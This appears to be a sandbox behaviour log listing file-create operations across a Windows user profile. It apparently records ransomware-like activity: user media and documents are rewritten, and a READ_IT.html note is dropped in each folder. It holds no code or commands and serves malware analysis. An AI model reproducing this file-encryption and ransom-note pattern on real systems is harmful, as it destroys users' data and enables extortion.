Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\YbWCW_EpzK5By0z.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\X8k-TB9nSgqIJ6\zmkOg8xlo9RCs.mkv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\2I7JnWG0LWz13O.flv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\55QyNPcjbWZw8F.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\Mrd3L.mp4	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Videos\a0EWjZO0H70q\UrNkmksgAz1mrC-KZEW\ZGIRTyBopanWciF8O1.swf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\Everywhere.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Searches\Indexed Locations.search-ms	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Saved Games\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Saved Games\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\2B4wMbwVq9SNluu4Mk.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\3JtCbgJTkKSXrDHl2vx.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\4tyoVjchuR84aw.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\6BloETBFt_jtJmwTWVVk.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\6QfPygn63k3CNso.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\70yIEg1GZzXq5b23S.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\7eR4.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\A3L WgbY9v41odw.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\bAzjHbM7.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\L5W5AG34.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\mNI47gY8.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\t13iG5ENuTJ-qPeSi.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\W6pfO.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\xv87g_eB5_wmmMt.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\1CHeMfy7 NjqW CZ2-.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\20pscY4eiNtD.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\5k_z7icfE.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\AXzS.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\bVnuTIRu.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\bYag45rCOLmmxmyin.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\EuOR.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\hP6 M97OYvSDIf9gVg.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\L4NdGUY34ih.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\l5I02B2iyCeNnq.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\LGe1Fh5Wpy.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\O4AeQaMpJ.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\Pi8Yz0Gz9vOf3GFN4IPA.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\PUM C5 EO8GuRvQsK Q.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\rPPTHo8.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\s9Nds2xUYNwEt _S-wO.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\sgHYdeAqpOmbl.png	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\SVECNQz.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\U5G0d.bmp	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\urdg 07FE.jpg	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Pictures\w7S1sef\XiYf9-9V196.gif	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\C-i8QaJluhn9gm.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\ckT7-AE.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\EWZkiKK.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\kfX_hFl afgz CCphF6M.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\L AqupJXv.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\NibX.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\pyQu8BmB KNqlRuQe.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\r3O1jCzIvgS-.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\rOdnZPK7V.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\RtsLtclt.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\vAF0ydk gO1dF_Z.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\VTfTWsBPNzMHn.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\zbcik6OtmH-.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\2DYiy8BvC1.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\754eV 9 H9g6gb.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\9tb-tPFVOb2uj9R.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\gNAwN.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\I6Hp4-HY MkwGzm.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\Ia lSGWjh6c5U0B H.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\jIUn.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\kS2_r71.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\L36FytEnJl.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\lLAOaa6e1cVocJ6VP.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\lPaNijrRt6q-RoAj m50.m4a	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\LQuKOV.wav	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\RU6bNn.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\Tf4wrU.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Music\PoiBG_Ey7M-NcYKD\z4nKiw5qLW-1.mp3	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\Desktop.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\Downloads.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Links\RecentPlaces.lnk	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Get Windows Live.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Windows Live Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Windows Live Mail.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Windows Live\Windows Live Spaces.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Autos.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Entertainment.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Money.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN Sports.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSN.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\MSN Websites\MSNBC News.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\IE Add-on site.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\IE site on Microsoft.com.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\Microsoft At Home.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\Microsoft At Work.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Microsoft Websites\Microsoft Store.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\Suggested Sites.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Favorites\Links\Web Slice Gallery.url	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\ChromeSetup.exe	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Downloads\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\0yzd1AF1TXI8bw.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\READ_IT.html	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\4NeLGlgmC3gp9926cjXJ.pdf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\8iuJAj-TJMwgMpxgt.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\a2zN2i8e425ITp.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Brs2hg-mdiC176pMg3.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\BSCI0Nbj_4h1m E.ppt	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\CEVp.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\ClSQNOC.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\desktop.ini	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\EcXY-g-QNVGVRke.csv	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\fOVrO73aJNtj25.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\gOuzYN7OUc-v.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\hGZp56Gcx1rkrb_jQM.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\J8xelqpfMwhFwUdd1rt.pps	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\KpmFjxBCL _z_xv.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\LorXOqQkVS6f-CJB3Y.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\lvlZfVQPqjkRs.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\m3cKl.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\M9d60zrm69ZwPT.docx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\N9kR1O8Sic34aaPindff.pptx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\Nu Wcixbhe 2upa1m.xlsx	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
